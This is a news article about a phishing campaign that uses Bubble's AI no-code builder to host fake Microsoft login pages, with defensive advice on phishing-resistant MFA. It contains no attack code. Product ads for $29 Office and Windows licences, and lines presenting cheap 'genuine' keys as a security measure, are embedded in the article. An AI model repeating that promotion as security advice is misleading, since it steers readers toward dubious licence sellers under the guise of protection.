Phishing Campaign Exploits No-Code AI Platform to Steal Microsoft Account Credentials

What Happened

Security researchers have uncovered a sophisticated phishing campaign that weaponises Bubble, a popular no-code application builder powered by AI, to create convincing credential-harvesting pages targeting Microsoft account holders. The threat actors are generating malicious web applications through Bubble's drag-and-drop interface, then hosting them on the platform's legitimate infrastructure to evade traditional security filters.

The attack chain works by sending victims emails that appear to originate from trusted sources, directing them to Bubble-hosted pages that mirror Microsoft's login interface with near-pixel-perfect accuracy. Because the phishing pages sit on Bubble's own domains — which carry strong reputation scores and valid SSL certificates — they slip past email gateways, URL scanners, and browser-based phishing protection that rely on domain reputation as a primary signal.

Office 2024 Pro Plus

Word, Excel, PowerPoint + more. 3 Devices.

$29

Buy Now →

Windows 11 Pro

Professional Edition. 3 Devices.

$29

Buy Now →

Office 365 Lifetime

5 Devices. Lifetime Account.

$29

Buy Now →

Visio 2024 Pro

Professional Diagramming. 3 Devices.

$29

Buy Now →

Project 2024 Pro

Project Management. 3 Devices.

$29

Buy Now →

Win 11 + Office Bundle

Win 11 Pro + Office + Visio + Project

$49.99

Buy Now →

BleepingComputer, which first reported the campaign, confirmed that multiple enterprise organisations have been affected. The stolen credentials are being used for business email compromise, lateral movement within corporate Microsoft 365 tenants, and in some cases, ransomware deployment. Microsoft's own threat intelligence team has acknowledged the vector and is working with Bubble to implement countermeasures.

Background and Context

No-code and low-code platforms have exploded in popularity over the past three years, with Bubble alone reporting more than four million applications built on its infrastructure. These platforms democratise software development, letting anyone spin up functional web applications without writing a single line of code. That same accessibility, however, has created a new class of attack surface.

This is not the first time legitimate SaaS infrastructure has been abused for phishing. Attackers have previously leveraged Google Sites, Microsoft Azure Blob Storage, and Cloudflare Pages to host credential-harvesting pages. The common thread is trust inheritance: security tools are reluctant to block domains belonging to major platforms because doing so would cause massive false-positive disruption.

The AI component adds a new dimension. Bubble's AI assistant can generate form layouts, authentication flows, and styled pages in minutes, dramatically reducing the technical barrier for creating convincing phishing infrastructure. What once required HTML knowledge and manual hosting can now be accomplished through natural-language prompts, making the attack accessible to a far wider pool of threat actors.

For businesses running on Microsoft 365 — which includes the vast majority of enterprises — this represents a direct threat to their identity perimeter. Anyone using an affordable Microsoft Office licence or corporate 365 subscription should take immediate note of the attack vector and review their phishing defence posture.

Why This Matters

This campaign exposes a fundamental weakness in the security industry's reliance on domain reputation as a trust signal. When phishing pages live on domains belonging to legitimate, well-known platforms, the traditional blocklist approach fails completely. Security vendors will need to evolve toward content-based analysis — examining what a page actually does rather than where it lives.

The democratisation of attack tooling through AI-powered no-code platforms represents a structural shift in the threat landscape. The barrier to entry for creating sophisticated phishing campaigns has dropped from "needs to understand HTML, CSS, and web hosting" to "can type a description of what they want." This compression of the skill requirement means the volume of phishing attacks is likely to increase significantly, even as individual campaigns become harder to detect.

For Microsoft account holders specifically, the risk is amplified by the centralised nature of Microsoft's identity system. A compromised Microsoft account doesn't just give attackers access to email — it potentially unlocks OneDrive, SharePoint, Teams, and every connected enterprise application. The blast radius of a single stolen credential in the Microsoft ecosystem is enormous.

Industry Impact

The security industry is being forced to reckon with the dual-use nature of every productivity tool. No-code platforms, AI assistants, and cloud hosting services are all force multipliers — they amplify capability regardless of intent. Platform providers like Bubble now face the difficult challenge of enabling legitimate users while preventing abuse, without introducing friction that undermines their core value proposition.

Email security vendors are already scrambling to adapt. Companies like Proofpoint, Mimecast, and Abnormal Security will need to deploy more sophisticated page-rendering and behavioural analysis to catch these attacks. Static URL scanning is no longer sufficient when the hosting infrastructure is inherently trusted.

Microsoft itself faces pressure to strengthen its authentication defences. The company has been pushing passkeys and phishing-resistant MFA through its Entra ID platform, but adoption remains uneven across its massive customer base. This campaign will likely accelerate enterprise migration to hardware-backed authentication methods.

For organisations that depend on enterprise productivity software built on Microsoft's ecosystem, the message is clear: identity protection must be treated as a first-class security priority, not an afterthought bolted onto existing infrastructure.

Expert Perspective

The convergence of AI-powered development tools and phishing is a predictable evolution that the security community has been warning about for over a year. What makes this particular campaign noteworthy is not its sophistication in isolation, but the scalability it demonstrates. A single threat actor can now generate dozens of unique, convincing phishing pages per day using natural-language prompts.

The defensive response needs to be equally scalable. Organisations should implement conditional access policies that restrict authentication to managed devices and known network locations. FIDO2 security keys and passkeys should be mandated for privileged accounts at minimum, with a roadmap to extend phishing-resistant MFA to all users.

What This Means for Businesses

Small and mid-size businesses are disproportionately vulnerable to this type of attack. They often lack dedicated security teams, rely heavily on Microsoft 365 for daily operations, and may not have deployed advanced email security beyond Microsoft's built-in protection. The cost of a compromised Microsoft tenant — including business email compromise fraud, data exfiltration, and operational disruption — can be devastating.

Immediate actions include enabling number-matching MFA in Microsoft Authenticator, deploying conditional access policies to block legacy authentication protocols, and conducting targeted phishing awareness training that specifically addresses attacks hosted on trusted platforms. Businesses should also ensure they're running legitimate, properly licensed software — using a genuine Windows 11 key and keeping systems updated is a baseline defence against post-compromise exploitation.

Key Takeaways

• Threat actors are using Bubble's AI-powered no-code platform to create and host phishing pages targeting Microsoft credentials
• The attacks bypass traditional security filters because they're hosted on legitimate, high-reputation domains
• AI tools have dramatically lowered the skill barrier for creating convincing phishing infrastructure
• Compromised Microsoft accounts can unlock access to entire enterprise environments
• Phishing-resistant MFA (passkeys, FIDO2 keys) is the most effective defence against credential theft
• Domain reputation alone is no longer a reliable signal for identifying malicious content

Looking Ahead

Expect no-code platform abuse to become a persistent feature of the phishing landscape. Platform providers will implement content scanning and abuse detection, but the cat-and-mouse dynamic will continue as attackers find new ways to evade automated checks. The security industry's shift toward content-based and behavioural analysis — examining what pages do rather than where they live — will accelerate. For enterprises, the transition to phishing-resistant authentication is no longer optional; it's an operational necessity.